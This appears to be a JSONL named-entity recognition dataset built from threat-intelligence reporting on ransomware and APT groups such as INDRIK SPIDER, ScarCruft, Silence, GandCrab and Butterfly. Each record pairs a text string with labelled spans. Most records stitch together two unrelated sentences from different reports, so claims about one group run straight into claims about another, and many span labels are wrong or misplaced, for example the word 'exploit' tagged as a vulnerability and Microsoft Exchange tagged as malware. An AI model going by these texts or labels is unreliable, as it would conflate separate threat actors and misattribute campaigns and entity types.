{"text": "Later , in January 2018 , a report was released that identified similarities between the BitPaymer ransomware and Dridex malware . But before the ScarCruft infection , however , another APT group also targeted this victim with the host being infected with GreezeBackdoor on March 26 , 2018 .", "spans": [{"start": 89, "end": 109, "label": "System"}, {"start": 114, "end": 128, "label": "System"}, {"start": 146, "end": 155, "label": "Organization"}]}
{"text": "The report authors renamed the malware \" FriedEx \" . ScarCruft has a keen interest in North Korean affairs , attacking those in the business sector who may have any connection to North Korea , as well as diplomatic agencies around the globe .", "spans": [{"start": 41, "end": 48, "label": "System"}, {"start": 53, "end": 62, "label": "Organization"}, {"start": 132, "end": 147, "label": "Organization"}, {"start": 204, "end": 223, "label": "Organization"}]}
{"text": "Falcon Intelligence has analyzed this malware and can confirm the overlap between BitPaymer/FriedEx and Dridex malware . Earlier this month , we caught another zero-day Adobe Flash Player exploits deployed in targeted attacks .", "spans": [{"start": 0, "end": 19, "label": "Organization"}, {"start": 82, "end": 99, "label": "System"}, {"start": 104, "end": 118, "label": "System"}, {"start": 160, "end": 168, "label": "Vulnerability"}, {"start": 169, "end": 187, "label": "System"}]}
{"text": "Though there is no functionality to collect this information in the ransomware itself , the ransomware is deployed by INDRIK SPIDER in parallel with Dridex malware , and the Dridex malware contains modules that may be used to collect information from infected hosts . ScarCruft is a relatively new APT group ; victims have been observed in several countries , including Russia , Nepal , South Korea , China , India , Kuwait and Romania .", "spans": [{"start": 149, "end": 163, "label": "System"}, {"start": 174, "end": 188, "label": "System"}, {"start": 268, "end": 277, "label": "Organization"}]}
{"text": "Falcon Intelligence has acquired multiple decryption tools related to BitPaymer , which confirm the theory that a unique key is used for each infection . Currently , the group is engaged in two major operations : Operation Daybreak and Operation Erebus .", "spans": [{"start": 0, "end": 19, "label": "Organization"}, {"start": 70, "end": 79, "label": "System"}]}
{"text": "Unlike many ransomware operations , which usually just require victims to make the payment and subsequently download a decryptor , INDRIK SPIDER requires the victim to engage in communication with an operator . The other one , ScarCruft 's Operation Erebus employs an older exploit , for CVE-2016-4117 and leverages watering holes .", "spans": [{"start": 274, "end": 281, "label": "Vulnerability"}, {"start": 288, "end": 301, "label": "Vulnerability"}]}
{"text": "Falcon Intelligence has had unique insight into the email dialogue between a victim and an INDRIK SPIDER operator . The other one , \" Operation Erebus \" employs an older exploit , for CVE-2016-4117 and leverages watering holes .", "spans": [{"start": 0, "end": 19, "label": "Organization"}, {"start": 170, "end": 177, "label": "Vulnerability"}, {"start": 184, "end": 197, "label": "Vulnerability"}]}
{"text": "Initial victim communication with the INDRIK SPIDER operator , using one of the email addresses provided , results in the operator providing key pieces of information up front , such as the BTC address and the ransom amount . We will publish more details about the attack once Adobe patches the vulnerability , which should be on June 16 .", "spans": [{"start": 38, "end": 51, "label": "Organization"}]}
{"text": "It was made clear during communications that INDRIK SPIDER is not willing to negotiate on the ransom amount , explicitly stating that the victim can use multiple Bitcoin exchanges to obtain the number of BTC required , and the exchange rate should be calculated based on the rate posted on the cryptocurrency exchange Bittrex . The ScarCruft APT gang has made use of a Flash zero day patched Thursday by Adobe to attack more than two dozen high-profile targets in Russia and Asia primarily .", "spans": [{"start": 25, "end": 39, "label": "Organization"}, {"start": 294, "end": 308, "label": "Organization"}, {"start": 369, "end": 374, "label": "System"}, {"start": 375, "end": 383, "label": "Vulnerability"}]}
{"text": "Of note , INDRIK SPIDER specifies the geographical location of where the victim should seek help , confirming that they know key information about the victim . Adobe on Thursday patched a zero-day vulnerability in Flash Player that has been used in targeted attacks carried out by a new APT group operating primarily against high-profile victims in Russia and Asia .", "spans": [{"start": 10, "end": 23, "label": "Organization"}, {"start": 188, "end": 196, "label": "Vulnerability"}, {"start": 214, "end": 219, "label": "System"}]}
{"text": "INDRIK SPIDER uses file sharing platforms to distribute the BitPaymer decryptor . Researchers at Kaspersky Lab privately disclosed the flaw to Adobe after exploits against the zero-day were used in March by the ScarCruft APT gang in what Kaspersky Lab is calling Operation Daybreak .", "spans": [{"start": 0, "end": 13, "label": "Organization"}, {"start": 19, "end": 41, "label": "System"}, {"start": 60, "end": 79, "label": "System"}, {"start": 97, "end": 110, "label": "Organization"}, {"start": 176, "end": 184, "label": "Vulnerability"}, {"start": 238, "end": 251, "label": "Organization"}]}
{"text": "In an extensive email to the victim , the INDRIK SPIDER operator provides a decryptor download link , decryptor deletion link ( to be used following decryptor download ) and a password . Kaspersky speculates that ScarCruft could also be behind another zero-day , CVE-2016-0147 , a vulnerability in Microsoft XML Core Services that was patched in April .", "spans": [{"start": 42, "end": 55, "label": "Organization"}, {"start": 187, "end": 196, "label": "Organization"}, {"start": 213, "end": 222, "label": "Organization"}, {"start": 252, "end": 260, "label": "Vulnerability"}, {"start": 263, "end": 276, "label": "Vulnerability"}, {"start": 298, "end": 307, "label": "Organization"}, {"start": 308, "end": 311, "label": "System"}]}
{"text": "The recommendations provided are not only good advice , but also provide indications of how INDRIK SPIDER breaches organizations and moves laterally until domain controller access is gained . attacks start with spear-phishing emails that include a link to a website hosting an exploit kit associated with ScarCruft and used in other attacks .", "spans": [{"start": 92, "end": 105, "label": "Organization"}, {"start": 226, "end": 232, "label": "System"}, {"start": 277, "end": 284, "label": "Vulnerability"}, {"start": 305, "end": 314, "label": "Organization"}]}
{"text": "Ransom demands have varied significantly , suggesting that INDRIK SPIDER likely calculates the ransom amount based on the size and value of the victim organization . Another set of attacks called Operation Erebus leverages another flash exploit , CVE-2016-4117 , and relies on watering hole attacks as a means of propagation .", "spans": [{"start": 59, "end": 72, "label": "Organization"}, {"start": 231, "end": 236, "label": "System"}, {"start": 237, "end": 244, "label": "Vulnerability"}, {"start": 247, "end": 260, "label": "Vulnerability"}]}
{"text": "INDRIK SPIDER consists of experienced malware developers and operators who have likely been part of the group since the early days of Dridex operations , beginning in June 2014 . Thursday 's Flash Player update patched 36 vulnerabilities in total including the zero day CVE-2016-4171 .", "spans": [{"start": 0, "end": 13, "label": "Organization"}, {"start": 134, "end": 140, "label": "System"}, {"start": 191, "end": 196, "label": "System"}, {"start": 261, "end": 269, "label": "Vulnerability"}, {"start": 270, "end": 283, "label": "Vulnerability"}]}
{"text": "The formation of the group and the modus operandi changed significantly in early 2017 . The ongoing operation likely began as early as January 2017 and has continued through the first quarter of 2019 .", "spans": []}
{"text": "Dridex operations became more targeted , resulting in less distribution and Dridex sub-botnets in operation , and BitPaymer ransomware operations began in July 2017 . Cisco Talos assess with high confidence that these operations are distinctly different and independent from the operations performed by DNSpionage , which we reported on in November 2018 .", "spans": [{"start": 0, "end": 6, "label": "System"}, {"start": 76, "end": 82, "label": "System"}, {"start": 114, "end": 134, "label": "System"}, {"start": 167, "end": 178, "label": "Organization"}]}
{"text": "There is no doubt that BitPaymer ransomware operations are proving successful for Indrik Spider , with an average estimate take of over $200,000 USD per victim , but it is also important to remember that INDRIK SPIDER continues to operate the Dridex banking trojan . We assess with high confidence that these operations are distinctly different and independent from the operations performed by DNSpionage , which we reported on in November 2018 .", "spans": [{"start": 23, "end": 32, "label": "System"}, {"start": 33, "end": 43, "label": "System"}, {"start": 204, "end": 217, "label": "Organization"}, {"start": 243, "end": 264, "label": "System"}]}
{"text": "There is no doubt that BitPaymer ransomware operations are proving successful for this criminal group , with an average estimate take of over $200,000 USD per victim , but it is also important to remember that INDRIK SPIDER continues to operate the Dridex banking trojan . The common use of the Enfal Trojan suggests that Shadow Network may be exchanging tools and techniques .", "spans": [{"start": 23, "end": 32, "label": "System"}, {"start": 33, "end": 43, "label": "System"}, {"start": 249, "end": 270, "label": "System"}, {"start": 295, "end": 307, "label": "Malware"}]}
{"text": "Though Dridex is still bringing in criminal revenue for the actor after almost four years of operation , targeted wire fraud operations likely require lengthy planning . While Silence had previously targeted Russian banks , Group-IB experts also have discovered evidence of the group 's activity in more than 25 countries worldwide .", "spans": [{"start": 7, "end": 13, "label": "System"}, {"start": 170, "end": 183, "label": "Organization"}, {"start": 216, "end": 221, "label": "Organization"}, {"start": 224, "end": 232, "label": "Organization"}]}
{"text": "In scenarios where wire fraud is not as lucrative an option , INDRIK SPIDER might use ransomware to monetize the compromise instead . In August 2017 , the National Bank of Ukraine warned state-owned and private banks across the country about a large-scale phishing attack .", "spans": [{"start": 155, "end": 168, "label": "Organization"}, {"start": 203, "end": 216, "label": "Organization"}]}
{"text": "INDRIK SPIDER isn't the only criminal actor running big game hunting operations ; The first ransomware to stake a claim for big game hunting was Samas ( aka SamSam ) , which is developed and operated by BOSS SPIDER . The threat actor used an exploit from the arsenal of the state-sponsored hacker group APT28 .", "spans": [{"start": 92, "end": 102, "label": "System"}, {"start": 145, "end": 150, "label": "System"}, {"start": 157, "end": 163, "label": "System"}, {"start": 242, "end": 249, "label": "Vulnerability"}, {"start": 303, "end": 308, "label": "Organization"}]}
{"text": "Since they were first identified in January 2-16 , this adversary has consistently targeted large organizations for high ransom demands . The new threat actor group was eventually named Silence .", "spans": []}
{"text": "In July 2017 , INDRIK SPIDER joined the movement of targeted ransomware with BitPaymer . Silence is a group of Russian-speaking hackers , based on their commands language , the location of infrastructure they used , and the geography of their targets ( Russia , Ukraine , Belarus , Azerbaijan , Poland , and Kazakhstan ) .", "spans": [{"start": 77, "end": 86, "label": "System"}]}
{"text": "Most recently , the ransomware known as Ryuk came to market in August 2017 and has netted its operators , tracked by Falcon Intelligence as GRIM SPIDER , a significant ( and immediate ) profit in campaigns also targeting large organizations . Although Silence 's phishing emails were also sent to bank employees in Central and Western Europe , Africa , and Asia ) .", "spans": [{"start": 20, "end": 30, "label": "System"}, {"start": 40, "end": 44, "label": "System"}, {"start": 117, "end": 136, "label": "Organization"}, {"start": 140, "end": 151, "label": "Organization"}, {"start": 272, "end": 278, "label": "System"}, {"start": 297, "end": 311, "label": "Organization"}]}
{"text": "The WIZARD SPIDER threat group is the Russia-based operator of the TrickBot banking malware . Silence also used Russian-language web hosting services .", "spans": [{"start": 4, "end": 17, "label": "Organization"}, {"start": 67, "end": 91, "label": "System"}, {"start": 129, "end": 149, "label": "Malware"}]}
{"text": "The LUNAR SPIDER threat group is the Eastern European-based operator and developer of the commodity banking malware called BokBot ( aka IcedID ) , which was first observed in April 2017 . Financially motivated APT groups which focus efforts on targeted attacks on the financial sector such as \u2014 Anunak , Corkow , Buhtrap \u2014 usually managed botnets using developed or modified banking Trojans .", "spans": [{"start": 4, "end": 29, "label": "Organization"}, {"start": 123, "end": 129, "label": "System"}, {"start": 136, "end": 142, "label": "System"}, {"start": 268, "end": 284, "label": "Organization"}, {"start": 304, "end": 310, "label": "Malware"}, {"start": 375, "end": 382, "label": "Organization"}]}
{"text": "The BokBot malware provides LUNAR SPIDER affiliates with a variety of capabilities to enable credential theft and wire fraud , through the use of webinjects and a malware distribution function . They tried new techniques to steal from banking systems , including AWS CBR ( the Russian Central Bank 's Automated Workstation Client ) , ATMs , and card processing .", "spans": [{"start": 4, "end": 18, "label": "System"}, {"start": 285, "end": 329, "label": "Organization"}, {"start": 334, "end": 338, "label": "Organization"}]}
{"text": "campaigns involving both BokBot and TrickBot were first identified by CrowdStrike Intelligence in July 2017 . Group-IB researchers were tracking Silence throughout this period and conducting response following incidents in the financial sector .", "spans": [{"start": 25, "end": 31, "label": "System"}, {"start": 36, "end": 44, "label": "System"}, {"start": 70, "end": 94, "label": "Organization"}, {"start": 110, "end": 118, "label": "Organization"}, {"start": 227, "end": 243, "label": "Organization"}]}
{"text": "These gtags have been closely associated with LUNAR SPIDER activity . Group-IB detected the first incidents relating to Silence in June 2016 .", "spans": [{"start": 6, "end": 11, "label": "System"}, {"start": 70, "end": 78, "label": "Organization"}]}
{"text": "Unit 42 followed network traces and pivoted on the information left behind by this actor , such as open directories , document metadata , and binary peculiarities , which enabled us to find a custom-made piece of malware , that we named \" CapturaTela \" . One of Silence 's first targets was a Russian bank , when they tried to attack AWS CBR .", "spans": [{"start": 0, "end": 7, "label": "Organization"}, {"start": 239, "end": 250, "label": "System"}, {"start": 301, "end": 305, "label": "Organization"}]}
{"text": "Our telemetry for this campaign identified email as the primary delivery mechanism and found the first related samples were distributed in August 2018 . They are selective in their attacks and wait for about three months between incidents , which is approximately three times longer than other financially motivated APT groups , like MoneyTaker , Anunak ( Carbanak ) , Buhtrap or Cobalt .", "spans": []}
{"text": "Aside from the use of the custom trojan CapturaTela , the actor makes extensive use of several other remote access Trojans to perform its malicious activities . Silence try to apply new techniques and ACTs of stealing from various banking systems , including AWS CBR , ATMs , and card processing .", "spans": [{"start": 40, "end": 51, "label": "System"}, {"start": 101, "end": 122, "label": "System"}]}
{"text": "Why would OurMine want to target WikiLeaks . Silence 's successful attacks currently have been limited to the CIS and Eastern European countries .", "spans": [{"start": 10, "end": 17, "label": "Organization"}, {"start": 33, "end": 42, "label": "Organization"}]}
{"text": "Instead , OurMine had managed to alter WikiLeaks 's DNS records ( held by a third-party registrar ) to direct anyone who tried to visit wikileaks.org to visit a different IP address which definitely wasn't under the control of Julian Assange and his cronies . He is responsible for developing tools for conducting attacks and is also able to modify complex exploits and third party software .", "spans": [{"start": 10, "end": 17, "label": "Organization"}, {"start": 39, "end": 48, "label": "Organization"}]}
{"text": "We don't know how OurMine managed to access WikiLeaks 's DNS records , but past experience has shown that their typical modus operandi is simply to log in using their victim 's password . Silence 's main targets are located in Russia , Ukraine , Belarus , Azerbaijan , Poland , and Kazakhstan .", "spans": [{"start": 44, "end": 53, "label": "Organization"}]}
{"text": "Alternatively , OurMine might have used social engineering to trick WikiLeaks 's DNS provider into handing over the credentials , or simple requested that a password reset link be sent to a compromised email address . However , some phishing emails were sent to bank employees in more than 25 countries of Central and Western Europe , Africa and Asia including : Kyrgyzstan , Armenia , Georgia , Serbia , Germany , Latvia , Czech Republic , Romania , Kenya , Israel , Cyprus , Greece , Turkey , Taiwan , Malaysia , Switzerland , Vietnam , Austria , Uzbekistan , Great Britain , Hong Kong , and others .", "spans": [{"start": 68, "end": 77, "label": "Organization"}, {"start": 81, "end": 93, "label": "Organization"}, {"start": 242, "end": 248, "label": "System"}, {"start": 262, "end": 276, "label": "Organization"}]}
{"text": "Alternatively , the attackers might have used social engineering to trick WikiLeaks 's DNS provider into handing over the credentials , or simple requested that a password reset link be sent to a compromised email address . In the same year , they conducted DDoS attacks using the Perl IRC bot and public IRC chats to control Trojans .", "spans": [{"start": 74, "end": 83, "label": "Organization"}, {"start": 87, "end": 99, "label": "Organization"}, {"start": 281, "end": 293, "label": "Malware"}, {"start": 298, "end": 314, "label": "Malware"}]}
{"text": "Known for hijacking prominent social media accounts , the self-styled white hat hacking group OurMine took over a number of verified Twitter and Facebook accounts belonging to the cable network . In the same year , Silence conducted DDoS attacks using the Perl IRC bot and public IRC chats to control Trojans .", "spans": [{"start": 30, "end": 42, "label": "Organization"}, {"start": 133, "end": 140, "label": "Organization"}, {"start": 145, "end": 153, "label": "Organization"}, {"start": 256, "end": 268, "label": "Malware"}, {"start": 273, "end": 289, "label": "Malware"}]}
{"text": "Last year , OurMine victimized Marvel , The New York Times , and even the heads of some of the biggest technology companies in the world . In two months , the group returned to their proven method and withdrew funds again through ATMs .", "spans": [{"start": 12, "end": 19, "label": "Organization"}, {"start": 40, "end": 58, "label": "Organization"}, {"start": 103, "end": 123, "label": "Organization"}]}
{"text": "Mark Zuckerberg , Jack Dorsey , Sundar Pichai , and Daniel Ek \u2014 the CEOs of Facebook , Twitter , Google and Spotify , respectively \u2014 have also fallen victim to the hackers , dispelling the notion that a career in software and technology exempts one from being compromised . In September 2017 , we discovered a new targeted attack on financial institutions .", "spans": [{"start": 76, "end": 84, "label": "Organization"}, {"start": 87, "end": 94, "label": "Organization"}, {"start": 97, "end": 103, "label": "Organization"}, {"start": 226, "end": 236, "label": "Organization"}, {"start": 333, "end": 355, "label": "Organization"}]}
{"text": "The group is well known : They hijacked WikiLeaks' DNS last month shortly after they took over HBO 's Twitter account ; last year , they took over Mark Zuckerberg 's Twitter and Pinterest accounts ; and they hit both BuzzFeed and TechCrunch not long after that . In September 2017 , we discovered Silence attack on financial institutions .", "spans": [{"start": 40, "end": 50, "label": "Organization"}, {"start": 102, "end": 109, "label": "Organization"}, {"start": 166, "end": 173, "label": "Organization"}, {"start": 178, "end": 187, "label": "Organization"}, {"start": 217, "end": 225, "label": "Organization"}, {"start": 230, "end": 240, "label": "Organization"}, {"start": 315, "end": 337, "label": "Organization"}]}
{"text": "OurMine is well known : They hijacked WikiLeaks' DNS last month shortly after they took over HBO 's Twitter account ; last year , they took over Mark Zuckerberg 's Twitter and Pinterest accounts ; and they hit both BuzzFeed and TechCrunch not long after that . The infection vector is a spear-phishing email with a malicious attachment .", "spans": [{"start": 0, "end": 7, "label": "Organization"}, {"start": 38, "end": 48, "label": "Organization"}, {"start": 100, "end": 107, "label": "Organization"}, {"start": 164, "end": 171, "label": "Organization"}, {"start": 176, "end": 185, "label": "Organization"}, {"start": 215, "end": 223, "label": "Organization"}, {"start": 228, "end": 238, "label": "Organization"}]}
{"text": "The group 's primary goal is demonstrating to companies that they have weak security . An interesting point in the Silence attack is that the cybercriminals had already compromised banking infrastructure in order to send their spear-phishing emails from the addresses of real bank employees and look as unsuspicious as possible to future victims .", "spans": [{"start": 181, "end": 188, "label": "Organization"}, {"start": 242, "end": 248, "label": "System"}, {"start": 276, "end": 290, "label": "Organization"}]}
{"text": "US intelligence agencies pinned the breach on North Korea ( one of the hacking group 's demands was that Sony pull The Interview , Seth Rogan 's comedy about a plot to assassinate Kim Jong-Un ) . The spear-phishing infection vector is still the most popular ACT to initiate targeted campaigns .", "spans": [{"start": 3, "end": 24, "label": "Organization"}, {"start": 105, "end": 109, "label": "Organization"}]}
{"text": "Of course , Sony ( one of Vevo 's joint owners ) fell victim to a devastating hack in 2014 after a group of hackers calling themselves the \" Guardians of Peace \" dumped a wealth of its confidential data online . We conclude that the actor behind the attack is Silence group , a relatively new threat actor that's been operating since mid-2016 .", "spans": [{"start": 12, "end": 16, "label": "Organization"}]}
{"text": "The cryptominer employed by Pacha Group , labeled Linux.GreedyAntd by Intezer , was completely undetected by all leading engines , demonstrating the sophistication of this malware . A preliminary analysis caught the attention of our Threat Analysis and Intelligence team as it yielded interesting data that , among other things , shows that Silence was targeting employees from financial entities , specifically in the Russian Federation and the Republic of Belarus .", "spans": [{"start": 50, "end": 66, "label": "System"}, {"start": 70, "end": 77, "label": "Organization"}, {"start": 363, "end": 372, "label": "Organization"}, {"start": 378, "end": 396, "label": "Organization"}]}
{"text": "Intezer has evidence dating back to September 2018 which shows Pacha Group has been using a cryptomining malware that has gone undetected on other engines . As shown above , the threat runs several native binaries to collect useful information for its recon phase .", "spans": [{"start": 0, "end": 7, "label": "Organization"}, {"start": 198, "end": 213, "label": "Malware"}]}
{"text": "The new miner employed by Pacha Group , named Linux.GreedyAntd , has shown to be more sophisticated than the average Linux threat , using evasion techniques rarely seen in Linux malware . The intelligence we have collected shows that Silence is part of a more extensive operation , still focused on financial institutions operating mainly on Russian territory .", "spans": [{"start": 26, "end": 37, "label": "Organization"}, {"start": 46, "end": 62, "label": "System"}, {"start": 172, "end": 185, "label": "System"}, {"start": 299, "end": 321, "label": "Organization"}]}
{"text": "Pacha Group is believed to be of Chinese origin , and is actively delivering new campaigns , deploying a broad number of components , many of which are undetected and operating within compromised third party servers . These spearphishing attempts represent an evolution of Iranian actors based on their social engineering tactics and narrow targeting .", "spans": [{"start": 0, "end": 11, "label": "Organization"}]}
{"text": "We have labeled the undetected Linux.Antd variants , Linux.GreedyAntd and classified the threat actor as Pacha Group . Based on file modification dates and timestamps of samples , it appears that the observed campaign was initiated in the middle of February 2016 , with the infrastructure taken offline at the start of March .", "spans": [{"start": 53, "end": 69, "label": "System"}]}
{"text": "Based on our findings Linux.GreedyAntd 's operations closely resemble previous cryptojacking campaigns deployed by Pacha Group in the past . While the Sima moniker could similarly originate from software labels , it is a common female Persian name and a Persian-language Word for \" visage \" or \" appearance \" . Given its use in more advanced social engineering campaigns against women 's rights activists , the label seem particularly apt .", "spans": [{"start": 22, "end": 38, "label": "System"}, {"start": 271, "end": 275, "label": "System"}, {"start": 342, "end": 370, "label": "Organization"}, {"start": 379, "end": 404, "label": "Organization"}]}
{"text": "Among the artifacts hosted in GreedyAntd 's servers , we managed to find a single component not related to the same cryptojacking operation just previously discussed and leveraged by Pacha Group . Samples and resource names contained the family names of prominent Iranians , and several of these individuals received the malware located in their respective folder .", "spans": [{"start": 30, "end": 40, "label": "System"}, {"start": 264, "end": 272, "label": "Organization"}]}
{"text": "It was one of the few ransomware strains that were being mass-distributed via email spam and exploit kits , but also as part of targeted attacks against high-profile organizations ( a tactic known as big-game hunting ) at the same time . The Sima group also engaged in impersonation of Citizenship and Immigration Services at the Department of Homeland Security , posing as a notice about the expiration of the recipient 's Permanent Residence status .", "spans": [{"start": 153, "end": 179, "label": "Organization"}, {"start": 242, "end": 246, "label": "Organization"}, {"start": 286, "end": 297, "label": "Organization"}, {"start": 302, "end": 322, "label": "Organization"}, {"start": 330, "end": 361, "label": "Organization"}]}
{"text": "The GandCrab author also had a spat with South Korean security vendor AhnLab last summer after the security firm released a vaccine for the GandCrab ransomware . In another case , Sima mirrored an announcement made about the broadcast of a television program on Iranian-American cultural affairs in order to impersonate the individual and engage in spearphishing within hours of the legitimate message .", "spans": [{"start": 4, "end": 12, "label": "System"}, {"start": 70, "end": 76, "label": "Organization"}, {"start": 99, "end": 112, "label": "Organization"}, {"start": 140, "end": 159, "label": "System"}, {"start": 180, "end": 184, "label": "Organization"}]}
{"text": "Recently , Sophos Labs has observed criminal groups scanning the internet for open MySQL databases running on Windows systems , which they tried to infect with GandCrab . The server used to host these malware samples was located on the German provider Hetzner ( 148.251.55.114 ) , within a small block of IP addresses that are registered with the customer ID \" HOS-156205 \" .", "spans": [{"start": 11, "end": 22, "label": "Organization"}, {"start": 160, "end": 168, "label": "System"}, {"start": 243, "end": 251, "label": "Organization"}, {"start": 305, "end": 307, "label": "Indicator"}]}
{"text": "CrowdStrike Intelligence has recently observed PINCHY SPIDER affiliates deploying GandCrab ransomware in enterprise environments , using lateral movement techniques and tooling commonly associated with nation-state adversary groups and penetration testing teams . All the samples appear to be have been compiled between February 29 and March 1 2016 , shortly before our discovery , suggesting that , despite the known C&C servers having quickly gone offline shortly after , this spree of attacks might be fresh and currently undergoing .", "spans": [{"start": 0, "end": 24, "label": "Organization"}, {"start": 47, "end": 60, "label": "Organization"}, {"start": 82, "end": 101, "label": "System"}, {"start": 418, "end": 421, "label": "System"}]}
{"text": "Probably the most high-profile attack that GandCrab was behind is a series of infections at customers of remote IT support firms in the month of February . These archives provide further indication that those entities behind the campaigns are Persian-language speakers , due to the naming of files and folders in Persian .", "spans": [{"start": 43, "end": 51, "label": "System"}, {"start": 92, "end": 101, "label": "Organization"}, {"start": 112, "end": 128, "label": "Organization"}]}
{"text": "CrowdStrike\u00ae Intelligence has recently observed PINCHY SPIDER affiliates deploying GandCrab ransomware in enterprise environments , using lateral movement techniques and tooling commonly associated with nation-state adversary groups and penetration testing teams . For the sake of narrative we are going to focus exclusively to those samples we identified being used in attacks against Iranian civil society and diaspora .", "spans": [{"start": 0, "end": 25, "label": "Organization"}, {"start": 48, "end": 61, "label": "Organization"}, {"start": 83, "end": 102, "label": "System"}, {"start": 394, "end": 407, "label": "Organization"}, {"start": 412, "end": 420, "label": "Organization"}]}
{"text": "PINCHY SPIDER is the criminal group behind the development of the ransomware most commonly known as GandCrab , which has been active since January 2018 . Butterfly has attacked multi-billion dollar companies operating in the internet , IT software , pharmaceutical , and commodities sectors .", "spans": [{"start": 0, "end": 13, "label": "Organization"}, {"start": 100, "end": 108, "label": "System"}, {"start": 154, "end": 163, "label": "Organization"}, {"start": 177, "end": 207, "label": "Organization"}, {"start": 250, "end": 264, "label": "Organization"}, {"start": 271, "end": 290, "label": "Organization"}]}
{"text": "PINCHY SPIDER sells access to use GandCrab ransomware under a partnership program with a limited number of accounts . The first signs of Butterfly 's activities emerged in early 2013 when several major technology and internet firms were compromised .", "spans": [{"start": 0, "end": 13, "label": "Organization"}, {"start": 34, "end": 53, "label": "System"}, {"start": 202, "end": 212, "label": "Organization"}, {"start": 217, "end": 231, "label": "Organization"}]}
{"text": "The main catalyst for dedicated development by PINCHY SPIDER , however , has been an ongoing battle with cybersecurity providers that are actively developing GandCrab mitigations and decryptors . However , an investigation by Symantec has found that the group has been active since at least March 2012 and its attacks have not only continued to the present day , but have also increased in number .", "spans": [{"start": 47, "end": 60, "label": "Organization"}, {"start": 105, "end": 128, "label": "Organization"}, {"start": 158, "end": 166, "label": "System"}, {"start": 226, "end": 234, "label": "Organization"}]}
{"text": "In February , PINCHY SPIDER released version 5.2 of GandCrab , which is immune to the decryption tools developed for earlier versions of GandCrab and in fact , was deployed the day before the release of the latest decryptor . Symantec has to date discovered 49 different organizations in more than 20 countries that have been attacked by Butterfly .", "spans": [{"start": 14, "end": 27, "label": "Organization"}, {"start": 52, "end": 60, "label": "System"}, {"start": 137, "end": 145, "label": "System"}, {"start": 226, "end": 234, "label": "Organization"}]}
{"text": "CrowdStrike Intelligence first identified new GandCrab ransomware deployment tactics in mid-February , when a threat actor was observed performing actions on a victim host in order to install GandCrab . Aside from the four companies which have publicly acknowledged attacks , Symantec has identified five other large technology firms compromised by Butterfly , primarily headquartered in the US .", "spans": [{"start": 0, "end": 24, "label": "Organization"}, {"start": 46, "end": 65, "label": "System"}, {"start": 192, "end": 200, "label": "System"}, {"start": 276, "end": 284, "label": "Organization"}, {"start": 317, "end": 333, "label": "Organization"}]}
{"text": "Using RDP and stolen credentials from the initially compromised host , the threat actor then proceeded to move laterally around the victim network and was able to deploy GandCrab across several other hosts . In the first attack , Butterfly gained a foothold by first attacking a small European office belonging to one firm and using this infection to then move on to its US office and European headquarters .", "spans": [{"start": 6, "end": 9, "label": "System"}, {"start": 170, "end": 178, "label": "System"}]}
{"text": "Near the end of February , CrowdStrike Intelligence observed another incident in which similar manual lateral movement techniques were used to deploy GandCrab across multiple hosts in an enterprise . However , technology is not the only sector the group has focused on and Symantec has found evidence that Butterfly has attacked three major European pharmaceutical firms .", "spans": [{"start": 27, "end": 51, "label": "Organization"}, {"start": 150, "end": 158, "label": "System"}, {"start": 210, "end": 220, "label": "Organization"}, {"start": 273, "end": 281, "label": "Organization"}, {"start": 350, "end": 370, "label": "Organization"}]}
{"text": "Once Domain Controller access was acquired , Pinchy Spider used the enterprise 's own IT systems management software , LANDesk , to deploy a loader to hosts across the enterprise . Butterfly has also shown an interest in the commodities sector , attacking two major companies involved in gold and oil in late 2014 .", "spans": [{"start": 119, "end": 126, "label": "System"}, {"start": 181, "end": 190, "label": "Organization"}, {"start": 225, "end": 243, "label": "Organization"}, {"start": 288, "end": 292, "label": "Organization"}, {"start": 297, "end": 300, "label": "Organization"}]}
{"text": "This loader , known as Phorpiex Downloader , is not specifically tied to GandCrab or PINCHY SPIDER , and it has previously been observed dropping other malware , such as Smoke Bot , Azorult , and XMRig . The company specializes in finance and natural resources specific to that region .", "spans": [{"start": 23, "end": 42, "label": "System"}, {"start": 73, "end": 81, "label": "Organization"}, {"start": 85, "end": 98, "label": "Organization"}, {"start": 170, "end": 179, "label": "System"}, {"start": 182, "end": 189, "label": "System"}, {"start": 196, "end": 201, "label": "System"}, {"start": 231, "end": 238, "label": "Organization"}]}
{"text": "As reported in the CrowdStrike 2018 Global Threat Report , big game hunting was a trend that helped define the criminal threat landscape in 2018 . The latter was one of at least three law firms Butterfly has targeted over the past three years .", "spans": [{"start": 184, "end": 193, "label": "Organization"}, {"start": 194, "end": 203, "label": "Organization"}]}
{"text": "BOSS SPIDER used both enterprise and per-host pricing during their campaigns . In many attacks , the group has succeeded in compromising Microsoft Exchange or Lotus Domino email servers in order to intercept company emails and possibly use them to send counterfeit emails .", "spans": [{"start": 0, "end": 11, "label": "Organization"}, {"start": 22, "end": 32, "label": "System"}, {"start": 37, "end": 53, "label": "System"}, {"start": 137, "end": 155, "label": "Malware"}, {"start": 159, "end": 185, "label": "Malware"}, {"start": 216, "end": 222, "label": "System"}, {"start": 265, "end": 271, "label": "System"}]}
{"text": "Both INDRIK SPIDER ( with BitPaymer ransomware ) and GRIM SPIDER ( with Ryuk ransomware ) have made headlines with their high profile victims and ransom profits , demonstrating that big game hunting is a lucrative enterprise . A powerful threat actor known as \" Wild Neutron \" ( also known as \" Jripbot \" and \" Morpho \" ) has been active since at least 2011 , infecting high profile companies for several years by using a combination of exploits , watering holes and multi-platform malware .", "spans": [{"start": 5, "end": 18, "label": "Organization"}, {"start": 26, "end": 35, "label": "System"}, {"start": 36, "end": 46, "label": "System"}, {"start": 53, "end": 64, "label": "Organization"}, {"start": 72, "end": 87, "label": "System"}, {"start": 295, "end": 302, "label": "Organization"}, {"start": 311, "end": 317, "label": "Organization"}, {"start": 370, "end": 392, "label": "Organization"}]}
{"text": "Running successful big game hunting operations results in a higher average profit per victim , allowing adversaries like PINCHY SPIDER and their partners to increase their criminal revenue quickly . Based on the profile of the victims and the type of information targeted by the attackers , Symantec believes that Butterfly is financially motivated , stealing information it can potentially profit from .", "spans": [{"start": 291, "end": 299, "label": "Organization"}]}
{"text": "The threat actor Rocke was originally revealed by Talos in August of 2018 and many remarkable behaviors were disclosed in their blog post . Wild Neutron hit the spotlight in 2013 , when it successfully infected companies such as Apple , Facebook , Twitter and Microsoft .", "spans": [{"start": 50, "end": 55, "label": "Organization"}, {"start": 229, "end": 234, "label": "Organization"}, {"start": 237, "end": 245, "label": "Organization"}, {"start": 248, "end": 255, "label": "Organization"}, {"start": 260, "end": 269, "label": "Organization"}]}
